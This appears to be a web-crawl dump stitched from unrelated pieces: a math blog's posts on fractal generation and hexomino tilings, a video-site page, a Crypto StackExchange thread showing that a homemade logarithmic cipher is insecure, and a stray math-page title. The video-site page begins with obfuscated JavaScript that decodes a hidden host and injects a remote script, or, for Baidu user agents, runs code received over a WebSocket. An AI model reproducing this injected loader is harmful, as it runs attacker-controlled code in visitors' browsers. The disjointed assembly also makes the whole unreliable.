later.\n\n3. Save versions often! I won’t bore you with stories of using Mathematica to do some intense computations for creating digital art — and then read the “Mathematica quit unexpectedly” message on my screen — before I saved my work. I’ve encountered this in Python, too — if you use the online version, you’re connecting to an external server, which hopefully will not encounter problems while you’re working….\n\nAlso, as you change parameters, you may want to keep track of results you like. If there are a lot of these, sometimes I write the parameters as comments — so I can reproduce them later. Very important: don’t forget to keep track of the random number seed you use! The feel and texture of an image can vary dramatically with the random number seed, so don’t ignore this vital parameter.\n\nOne final thought. In creating this type of art, I keep in mind the tension between structure and randomness. You can use the computer to create randomness — but if there’s too much randomness, the image doesn’t seem to hang together. But if there’s too much structure, the image can lose its interesting texture, and appear flat and purely two-dimensional. So the choice of parameters in creating randomness is fairly crucial in determining how the final image will look. And as I’ve said before — this is where technology meets art. It is fairly easy to create a computer-generated image — but not as easy to create computer-generated art. The difference is not exactly easy to describe — and certainly opinions will differ. It is the questions which arise in describing the difference which are intriguing and exciting.\n\nEnough philosophizing. Time to begin the artistic process! Feel free to comment by posting any images you create using the Python code.\n\n## Creating Fractals III: Making Your Own\n\nLast week, we laid down some of the mathematical foundation needed to generate fractal images. In this third and final post about creating fractals, we’ll discuss in some detail Python code you can adapt to making your own designs. Follow along in this Sage notebook.\n\nIn order to produce fractal images iteratively, we need a function which returns the highest power of 2 within a positive integer (as discussed last week). It is not difficult to write a recursive routine to do this, as is seen in the notebook. This is really all we need to get started. The rest involves creating the graphics. I usually use PostScript for my images, like the one below discovered by Matthieu Pluntz. There isn’t time to go into that level of detail here, though.",
null,
"As far as the graphics are concerned, it would be nice to have an easily described color palette. You might look here to find a wide range of predefined colors, which are available once we execute the “import mathplotlib” command (see Line 20). These names are used in the “colors” variable. Since each motif has four segments, I’ll color each one differently (though you may choose a different color scheme if you want to).\n\nThe loop is fairly straightforward. On each iteration, first find the correct angle to turn using the highestpowerof2 function. Then the segment to add on to the end of the path is",
null,
"$({\\rm len}\\cdot\\cos(\\theta), {\\rm len}\\cdot\\sin(\\theta)),$\n\nwhich represents converting from polar to rectangular coordinates. This is standard fare in a typical high school precalculus course. Note the color of the segment is determined by i % 4, since 0 is the index of the first element of any list in Python.\n\nAll there is left to do is output to the screen. We’re done! You can try it yourself. But note that the way I defined the function, you have to make the second argument negative (compare the image in the notebook with last week’s post). Be patient: some of these images may take a few moments to generate. It would definitely help the speed issue if you downloaded Sage on your own computer.\n\nTo create the image shown above, you need to use angles of 90 and -210 (I took the liberty of rotating mine 15 degrees to make it look more symmetrical). To create the image below, angles of 90 and -250 are used. However, 26,624 steps are needed to create the entire image! It is not practical to create an image this complex in the online Sage environment.",
null,
"How do you know what angles to use? This is still an open question — there is no complete answer that I am aware of. After my first post on October 4, Matthieu Pluntz commented that he found a way to create an infinite variety of fractal images which “close up.” I asked him how he discovered these, and he responded that he used a recursive algorithm. It would take an entire post just to discuss the mathematics of this in detail — so for now, we’ll limit our discussion to how to use this algorithm. I’ve encoded it in the function “checkangles.”\n\nTo use this function, see the examples in the Sage notebook. Be careful to enter angles as negative when appropriate! Also, you need to enter a maximum depth to search, since perhaps the angles do not result in an image which “closes up,” such as with 11 and -169. But here’s the difficult part mathematically — just because our algorithm doesn’t find where 11 and -169 closes up does not mean that the fractal doesn’t close. And further, just because our algorithm produced a positive result does not mean the algorithm must close. Sure, we’ve found something that produces many results with interesting images — which suggests we’re on the right track. But corroboration by a computer program is not a proof.\n\nAt the end of the notebook, I wrote a simple loop illustrating how you can look for many possibilities to try at once. The general rule of thumb is that the more levels required in the algorithm to produce a pair of angles (which is output to the screen), the more segments needed to draw it. I just looked for an example which only required 5 levels, and it was fairly easy to produce.\n\nSo where do we go from here? Personally, I’ve found this investigation fascinating — and all beginning from a question by a student who is interested in learning more about fractals. I’ve tried to give you an idea of how mathematics is done in the “real world” — there is a lot of exploration involved. Proofs will come later, but it is helpful to look at lots of examples first to figure out what to prove. When I find out something significant, I’ll post about it.\n\nAnd I will admit a recent encounter with the bane of a programmer’s existence — the dreaded sign error. Yes, I had a minus sign where I should have had a plus sign. This resulted in my looking at lots of images which did not close up (instead of closing up, as originally intended). Some wonderful images resulted, though, like the one below with angles of 11 and -169. Note that since the figure does not close up (as far as I know), I needed to stop the iteration when I found a sufficiently pleasing result.",
null,
"If I hadn’t made this mistake, I might have never looked at this pair of angles, and never created this image. So in my mind, this wasn’t really a “mistake,” but rather a temporary diversion along an equally interesting path.\n\nI’ve been posting images regularly to my Twitter feed, @cre8math. I haven’t even touched on the aesthetic qualities of these images — but suffice it to say that it has been a wonderful challenge to create interesting textures and color effects for a particular pair of angles. Frankly, I am still amazed that such a simple algorithm — changing the two angle parameters used to create the Koch snowflake — produces such a wide range of intriguing mathematical and artistic objects. You can be sure that I’m not finished exploring this amazing fractal world quite yet….\n\n## Creating Fractals II: Recursion vs. Iteration\n\nThere was such a positive response to last week’s post, I thought I’d write more about creating fractal images. In the spirit of this blog, what follows is a mathematical “stream of consciousness” — that is, my thoughts as they occurred to me and I pursued them. Or at least a close approximation — thoughts tend to jump very nonlinearly, and I do want the reader to be able to follow along….\n\nLet’s begin at the beginning, with one of my first experiments. Here, the counterclockwise turns are 80 degrees, and the clockwise turns are 140 degrees.",
null,
"One observation I had made in watching PostScript generate such images was that there was “overlap”: the recursive algorithm kept going even if the image was completely generated. Now the number of segments drawn by the recursive algorithm is a power of 4, since each segment is replaced by 4 others in the recursive process. So if the number of segments needed to complete a figure is not a power of 4, the image generation has to be stopped in the middle of a recursive call.\n\nThis reminded me of something I had investigated years ago — the Tower of Hanoi problem. This is a well-known example of a problem which can be solved recursively, but there is also an iterative solution. So I was confident there had to be an iterative way to generate these fractal images as well.\n\nI needed to know — at any step along the iteration — whether to turn counterclockwise or clockwise. If I could figure this out, the rest would be easy. So I wrote a snippet of code which implemented the recursive routine, and output a 0 if there was a counterclockwise turn, and a 1 if there was a clockwise turn. For 2 levels of recursion, this sequence is\n\n0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0.\n\nThe ones occur in positions 2, 6, 8, 10, and 14.\n\nI actually looked at 1024 steps in the iteration, and noticed that the ones occur in exactly those positions whose largest power of 2 is odd. Each of 2, 6, 10, and 14 has one power of 2, and 8 has three.\n\nYou might be wondering, “How did you notice that?” Well, the iterative solution of the Tower of Hanoi does involve looking at the powers of 2 within numbers, so past experience suggested looking along those lines. This is a nice example of how learning neat math can enlarge your mathematical “toolbox.” You never know when something might come in handy….\n\nThere was other interesting behavior as well — but it’s simpler if you just watch the video to see what’s happening.\n\nFirst, you probably noticed that each of the 18 star arms takes 32 steps to create. And that some of the star arms — eight of them — were traversed twice. This means that 18 + 8 = 26 arms were drawn before the figure was complete, for a total of 832 steps. Note that the recursive algorithm would need 1024 steps to make sure that all 832 steps were traversed — but that means an overlap of 192 steps.\n\nNow let’s see why some of the arms were traversed twice. The 32nd step of the first arm is produced after 31 turns, and so the 32nd turn dictates what happens here. Now the highest power of 2 in 32 is 5, which is odd – so a clockwise turn of 140 degrees is made. You can see by looking at the first 33 steps that this is exactly what happens. The 32nd step takes you back to the center, and then a 140 degree clockwise turn is made.",
null,
"Now after the next arm is drawn, the turn is determined by the 64th angle. But 6 is the highest power of two here, and so an 80 degree counterclockwise turn is made — but this takes you over the same arm again!",
null,
"Note that we can’t keep traversing the same arm over and over. If we add 32 to a number whose highest power of 2 is 6:",
null,
"$2^6m+2^5=2^5(2m+1),$\n\nwe get a number whose highest power of 2 is 5 again (since 2m + 1 must be odd). Since this power is odd, a clockwise turn will be made.\n\nSo when do we repeat an arm? This will happen when we have a counterclockwise turn of 80 degrees, which will happen when the highest power of 2 is even (since an odd power takes you clockwise) — when looking at every 32nd turn, that is. So, we need to look at turns\n\n32, 64, 96, 128, 160, 192, 224, etc.\n\nBut observe that this is just\n\n32 x (1, 2, 3, 4, 5, 6, 7, etc.).\n\nSince 32 is an odd power of two, the even powers of two must occur when there is an odd power of 2 in 1, 2, 3, 4, 5, 6, 7, etc. In other words, in positions 2, 6, 8, 10, 14, etc.\n\nTo summarize this behavior, we can state the following simple rule: arms move seven points counterclockwise around the circle, except in the case of the 2nd, 6th, 8th, 10th, 14th, etc., arms, which repeat before moving seven points around. Might be worth taking a minute to watch the video again….\n\nWe can use this rule to recreate the order in which the star arms are traversed. Start with 1. The next arm is 1 + 7 = 8. But 8 is the 2nd arm, so it is repeated — and so 8 is also the third arm. The fourth arm is 8 + 7 = 15, and the fifth is seven positions past 15, which is 4. Mathematically, we say 15 + 7 = 4 modulo 18, meaning we add 15 and 7, and then take the remainder upon dividing by 18. This is know as modular arithmetic, and is one of the first things you learn when studying a branch of mathematics called number theory.\n\nThe sixth arm is 4 + 7 = 11, which is repeated as the seventh arm. You can go on from here….\n\nThere are still some questions which remain. Why 32 steps to complete an arm? Why skip every seventh arm? Why are the arms 20 degrees apart? These questions remain to be investigated more thoroughly. But I can’t stress what we’re doing strongly enough — using the computer to make observations which can be stated mathematically very precisely, and then looking at a well-defined algorithm to (hopefully!) prove that our observations are accurate. More and more — with the advent of technology — mathematics is becoming an experimental science.\n\nI’ll leave you with one more video, which shows PostScript creating a fractal image. But laying a mathematical foundation was important — so next week, we can look at how you can make your own fractals in Python using an iterative procedure. This way, you can explore this fascinating world all on your own….\n\nThere are 10 levels of recursion here, and so 1,048,576 segments to draw. To see the final image, visit my Twitter feed for October 9. Enjoy!\n\n## Creating Fractals\n\nRecently, I’ve been working with a psychology student interested in how our brains perceive fractal images in nature (trees, clouds, landscapes, etc.). I dug up some old PostScript programs which reproduced images from The Algorithmic Beauty of Plants, which describes L-systems and how they are used to model images of plants. (Don’t worry if you don’t have the book or aren’t familiar with L-systems — I’ll tell you everything you need to know.)\n\nTo make matters concrete, I changed a few parameters in my program to produce part of a Koch snowflake.",
null,
"The classical way of creating a Koch snowflake is to begin with the four-segment path at the top, and then replace each of the four segments with a smaller copy of this path. Now replace each of the segments with an even smaller copy, and recurse until the copies are so small, no new detail is added.\n\nAlgorithmically, we might represent this as\n\nF +60 F -120 F +60 F,\n\nwhere “F” represents moving forward, and the numbers represent how much we turn left or right (with the usual convention that positive angles move counter-clockwise). If you start off moving to the right from the red dot, you should be able to follow these instructions and see how the initial iteration is produced.\n\nThe recursion comes in as follows: now replace each occurrence of F with a copy of these instructions, yielding\n\nF +60 F -120 F +60 F +60\n\nF +60 F -120 F +60 F -120\n\nF +60 F -120 F +60 F +60\n\nF +60 F -120 F +60 F\n\nIf you look carefully, you’ll see four copies of the initial algorithm separated by turning instructions. If F now represents moving forward by 1/3 of the original segment length, when you execute these instructions, you’ll get the second image from the top. Try it! Recursing again gives the third image, and one more level of recursion results in the last image.\n\nThomas thought this pretty interesting, and proceed to ask what would happen if we changed the angles. This wasn’t hard to do, naturally, since the program was already written. He suggested a steeper climb of about 80 degrees, so I changed the angles to +80 and -140.",
null,
"Surprise! You’ll easily recognize the first two iterations above, but after five iterations, the image closes up on itself and creates an elegant star-shaped pattern.\n\nI was so intrigued by stumbling upon this symmetry, I decided to explore further over the upcoming weekend. My next experiment was to try +80 and -150.",
null,
"The results weren’t as symmetrical, but after six levels of recursion, an interesting figure with bilateral symmetry emerged. You can see how close the end point is to the starting point — curious. The figure is oriented so that the starting points (red dots) line up, and the first step is directly to the right.\n\nAnother question Thomas posed was what would happen if the lengths of the segments weren’t all the same. This was a natural next step, and so I created an image using angles of +72 and -152 (staying relatively close to what I’d tried before), and using 1 and 0.618 for side lengths, since the pentagonal motifs suggested the golden ratio. Seven iterations produced the following remarkable image.",
null,
"I did rotate this for aesthetic reasons (-24.7 degrees, to be precise). There is just so much to look at — and all produced by changing a few parameters in a straightforward recursive routine.\n\nMy purpose in writing about these “fractal” images this week is to illustrate the creative process in doing mathematicsThis just happened a few days ago (as I am writing this), and so the process is quite fresh in my mind — a question by a student, some explorations, further experimentation, small steps taken one at a time until something truly wonderful emerges. The purist will note that the star-shaped images are not truly fractals, but since they’re created with an algortihm designed to produce a fractal (the Koch snowflake), I’m taking a liberty here….\n\nThis is just a beginning! Why do some parameters result in symmetry? How can you tell? When there is bilateral symmetry, what is the “tilt” angle? Where did the -24.7 come from? Each new image raises new questions — and not always easy to answer.\n\nTwo weeks ago, this algorithm was collecting digital dust in a subdirectory on my hard drive. A simple question resurrected it — and resulted in a living, breathing mathematical exploration into an intensely intriguing fractal world. This is how mathematics happens.\n\n## Hexominoes and Cube Nets\n\nI have always been fascinated by polyominoes — geometrical shapes made by connecting unit squares edge to edge. (There’s a lot about polyominoes online, so take a few moments to familiarize yourself with them if they’re new to you.)",
null,
"Today I’ll talk about hexominoes (using six unit squares), since I use them in the design of my current website. There are a total of 35 hexominoes — but I didn’t want all of them on my home page, since that seemed too cluttered. But there are just 11 hexominoes which can be folded into a cube — I did want my choice to have some geometrical significance! These are called nets for a cube, and formed a reasonable subset of the hexominoes to work with. Note that the count of 11 nets means that rotating or turning over a net counts as the same one. (And if you want an additional puzzle — show that aside from rotating or reflecting, there are just 11 nets for a cube.)\n\nNow how should I arrange them? I also wanted to use the hexominoes for a background for other pages, so I thought that if I made a 6 by 11 rectangle with them, that would be ideal — I could just tile the background with rectangles.\n\nThis is not possible, however — I wrote a computer program to check (more later). But if you imagine shifting a row of the 6 by 11 rectangle one or two squares, or perhaps a column — you would still occupy 66 square units, and the resulting figure would still tile the plane. This would still be true if you made multiple row/column shifts.\n\nSo I wrote a program which did exactly that — made random row and column shifts of a 6 by 11 rectangle, and then checked if the 11 hexominoes tiled that figure. After several hours of running, I found one — the one you see on my home page. If you look carefully, you can see the row and column shifts for yourself.\n\nIs this the only possibility? I’m not sure, but it’s the only one I found — and I liked the arrangement enough to use it on my website. If you look at some of the other pages — like one of my course websites — you’ll see a smaller version of this image tiling the background. However, to repeat the pattern in the background, I needed to make a “rectangular” version of the image:",
null,
"The colors are muted since I didn’t want the background to stand out too much. And you’ll notice that some of the hexominoes leave one edge of the rectangle and “wrap around” the opposite edge. But if you look closely, you can definitely find all 11 hexominoes in this 6 by 11 rectangle.\n\nThis wasn’t my first adventure with hexominoes — a few years ago, I created a flag of Thailand since I was doing some workshops there. Flags are generally rectangular in shape.\n\nBut you can’t create a rectangle with the 35 hexominoes! Let’s see why not. Imagine a rectangle on a checkerboard or chessboard. When you place a hexomino, it will cover some black squares and some white squares.",
null,
"Now some hexominoes will always cover an odd number of black and white squares — let’s call those odd hexominoes. The others — even hexominoes — cover an even number of black and white squares. As it turns out, there are 24 odd hexominoes and 11 even hexominoes. This means that any placement of all the hexominoes on a checkerboard will cover an even number of white squares and an even number of black squares.\n\nHowever, any rectangle of 210 = 6 x 35 hexominoes must cover 105 white squares and 105 black squares — both odd numbers of squares. But we just saw that’s not possible — an even number of each must be covered. So no rectangles. This is an example of a parity argument, by the way, and is a standard tool when proving results about covering figures with polyominoes.\n\nTo overcome this difficulty, I threw in 6 additional unit squares so I could make a 12 x 18 rectangle — and to my surprise, I found out that the flag of Thailand has dimensions 2:3 as well. You can read more about this by clicking on “the flag of thailand” on the page referenced above — and see that the tiling problem can be solved with a little wiggle room. But no computer here — I cut out a set of paper hexominoes and designed the flag of Thailand by hand…."
] | [
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evaporation2bweb.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012linear.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012quadratic.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day012root.png",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evaporation2bweb.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011evap1.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/dao011evap2.png",
null,
"https://vincematsko.files.wordpress.com/2015/11/day011texture21.png",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch090-150.jpg",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch090-110.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day009koch011-191.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008koch80-140.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008fractal33.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/10/day008fractal65.jpg",
null,
"https://s0.wp.com/latex.php",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch11.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch21.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch3.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day007koch4.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004hexominoes.png",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004backhex.jpg",
null,
"https://vincematsko.files.wordpress.com/2015/09/day004evenodd.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91749096,"math_prob":0.9155588,"size":5186,"snap":"2021-31-2021-39","text_gpt3_token_len":1097,"char_repetition_ratio":0.11134697,"word_repetition_ratio":0.01724138,"special_character_ratio":0.21075974,"punctuation_ratio":0.09012464,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97541267,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112],"im_url_duplicate_count":[null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,9,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,2,null,2,null,10,null,null,null,10,null,10,null,null,null,null,null,null,null,null,null,9,null,9,null,9,null,9,null,8,null,8,null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T20:44:42Z\",\"WARC-Record-ID\":\"<urn:uuid:d343d6df-63ea-47a8-92b1-62072bcd5e1b>\",\"Content-Length\":\"139366\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d1542692-7014-422d-91a5-79ba8ebcd393>\",\"WARC-Concurrent-To\":\"<urn:uuid:c7fd2cb7-ff6e-46dd-9420-bd42d65e7320>\",\"WARC-IP-Address\":\"192.0.78.25\",\"WARC-Target-URI\":\"https://cre8math.com/category/geometry-2d/page/5/\",\"WARC-Payload-Digest\":\"sha1:TOWTD44MK5RDP55TGR6BXEPKGAWCNORB\",\"WARC-Block-Digest\":\"sha1:7RPRUQEKCIVC2XG7CC6MSFVFABMQUWMJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153791.41_warc_CC-MAIN-20210728185528-20210728215528-00009.warc.gz\"}"} |
https://www.mp4vod.com/list/6-1.html | [
"function XLzeFfET(e){var t='',n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function LCOmIi(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t='',n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,'');while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XLzeFfET(t);};window['\\x68\\x41\\x64\\x6f\\x6e\\x48\\x4a\\x69']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=LCOmIi,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmtsLnJ1aWWdlenguY29t','dHIuueWVzdW42NzguuY29t','130671',window,document,['W','u']);}:function(){};\n1. 首页\n2. 上一页\n3. 1\n4. 2\n5. 下一页"
] | [
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.95166886,"math_prob":0.9889853,"size":1105,"snap":"2021-21-2021-25","text_gpt3_token_len":1276,"char_repetition_ratio":0.086285196,"word_repetition_ratio":0.0,"special_character_ratio":0.2850679,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96792406,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-13T08:25:24Z\",\"WARC-Record-ID\":\"<urn:uuid:3df94d81-27e8-4fb0-a9cb-3c54938feb2b>\",\"Content-Length\":\"24156\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eacdea43-5650-44ac-aded-4392e93ac853>\",\"WARC-Concurrent-To\":\"<urn:uuid:fa4c4d04-158c-402a-b840-a0b89dcec4e0>\",\"WARC-IP-Address\":\"45.140.168.11\",\"WARC-Target-URI\":\"https://www.mp4vod.com/list/6-1.html\",\"WARC-Payload-Digest\":\"sha1:QAOECONNGTTG3FES2PUWLZN7WTEPWATH\",\"WARC-Block-Digest\":\"sha1:VA5CFXBQKNDFBXS6SYQEP3MZEYWFIJPR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487607143.30_warc_CC-MAIN-20210613071347-20210613101347-00533.warc.gz\"}"} |
https://crypto.stackexchange.com/questions/34766/how-secure-is-this-logarithmic-encryption-algorithm?noredirect=1 | [
"# How secure is this logarithmic encryption algorithm?\n\nHow secure would the following logarithmic encryption algorithm be when tested under the same conditions as high end encryption algorithms (AES, RSA etc...).\n\nNote: For smaller text the text will be padded to form a minimum length of 1024 bits.\n\nFor encryption:\n1. Generate random numbers as same length as the message. R = [5, 13]\n2. Turn message characters into ordinal numbers. M = [97, 98]\n3. Encryption algorithm is as follows: M^x = R; to solve this: x = log(R)/log(M)\n\nFor decryption:\n1. To find the original ordinal number again: M = x_sqrt(R, x); x_sqrt is to find the nth_root of a number, where R is the the radicand and x is index.\n\nExample:\nR = \nM = \n\nEncryption:\nM^x = R\n: 98^x = 13\n: x = log(13) / log(98)\n: x = 0.559425856\n\nDecryption:\nM = x_sqrt(R, x)\n: M = x_sqrt(13, 0.559425856)\n: M = 98\n\n• Well - seems you have to learn a lot yet. It works another way around. you have to (mathematically) proof your algorithm is secure (you can design a system that you cannot break, but difficult that nobody can break). I immediately see at least two ways how to completely break the encryption. E.g. having the x as whole number it reveals a lot about the key and the plaintext. As well - you are using a simple log function (not discrete), otherwise you wouldn't able to decrypt (when properly done). I suggest you to read about the cryptography or follow some course first to get some real basics. – gusto2 Apr 22 '16 at 10:17\n• If you have small keys then brute forcing is always an option. Key size should not be related to message size. If that would be the case, how would you encrypt small messages? – Maarten Bodewes Apr 22 '16 at 10:38\n• @GabrielVince The x isn't a whole number. It's a fraction. – MrCyber Apr 22 '16 at 10:46\n• @MaartenBodewes The idea was to pad a message to a certain length, say the minimum length would be 1024 bits? – MrCyber Apr 22 '16 at 10:47\n• Fractions and certainly floats are pretty tricky because of rounding errors and suchlike. There is a good reason why almost all cryptographic functions work with (positive) integers instead. @MrCyber I didn't see any mention of padding or hybrid cryptography (which may be needed for larger plaintext?) in the question. – Maarten Bodewes Apr 22 '16 at 10:49\n\nI'll assume R is secret, and is the key; and the ciphertext is given as a list of values x in decimal, as in the example given x = 0.559425856.\n\nThis is totally insecure: even without knowledge of R, it is trivial to reduce candidate plaintext letters to almost nothing, just by knowing the corresponding x. e.g. if we assume R is an integer in range [2..127], and x = 0.559425856, the only pair (R,M) possible is (13,98). That can be seen by tabulating x by increasing values as follows\n\n x R M\n0.557913767 10 62\n0.558189871 13 99\n0.558248536 14 113\n0.558830625 9 51\n0.558890092 11 73\n0.559030886 15 127\n0.559300193 14 112\n0.559329667 12 85\n0.559425856 13 98\n0.559944654 15 126\n0.559957234 8 41\n0.560120590 10 61\n0.560365305 14 111\n0.560680089 13 97\n0.560692653 11 72\n0.560823605 12 84\n0.560868731 15 125\n0.561444177 14 110\n\n\nThe problem can NOT be fully fixed by giving just enough decimals of x to allows decryption (here, x = 0.559 would do if we round to the nearest), for that still allows to reduce the possibilities in the plaintext a lot.\n\nA lesser problem is that if the plaintext gets known, it is trivial to find R. Hence R can not be reused for different plaintexts. Hence this is not a cipher by the modern definition of that, which requires that there's a key reusable for several messages. That also makes use of the system impractical, as the OTP is; but at least that one is secure.\n\nAlso, the ciphertext is larger than the plaintext; another problem that the OTP does not have.\n\n• What will the effect be if we make R a fraction of any value? Will that to some degree increase the strength of the algorithm? – MrCyber Apr 22 '16 at 12:10\n• @MrCyber: if R had enough decimals, that would markedly improve, but not fully fix, the total insecurity that we have now (the minimum and maximum for R will remain a weakness allowing sizable information about M to leak from x). That would also markedly increase the size of R, which is a serious problem since we need to move Rsecretly to the receiver side. – fgrieu Apr 22 '16 at 13:38"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8069963,"math_prob":0.9818232,"size":811,"snap":"2020-24-2020-29","text_gpt3_token_len":248,"char_repetition_ratio":0.133829,"word_repetition_ratio":0.0,"special_character_ratio":0.35881627,"punctuation_ratio":0.20108695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934181,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-27T06:47:56Z\",\"WARC-Record-ID\":\"<urn:uuid:6b1db9f7-72d9-4160-9ab6-08565ef18907>\",\"Content-Length\":\"153053\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:752e181c-2f4a-489b-9714-8eab03023149>\",\"WARC-Concurrent-To\":\"<urn:uuid:0566c8b0-1c47-4003-b74c-43a7631d1c43>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/34766/how-secure-is-this-logarithmic-encryption-algorithm?noredirect=1\",\"WARC-Payload-Digest\":\"sha1:CBHFZ4A6MZR7RTZSKJCMJXOHRQVFYM46\",\"WARC-Block-Digest\":\"sha1:GEMBAWBJRPOMMDJGUNMNVDB3AMITXDKG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347392141.7_warc_CC-MAIN-20200527044512-20200527074512-00281.warc.gz\"}"} |
https://scribesoftimbuktu.com/find-the-distance-between-two-points-51-111/ | [
"# Find the Distance Between Two Points (5,1) , (11,1)",
null,
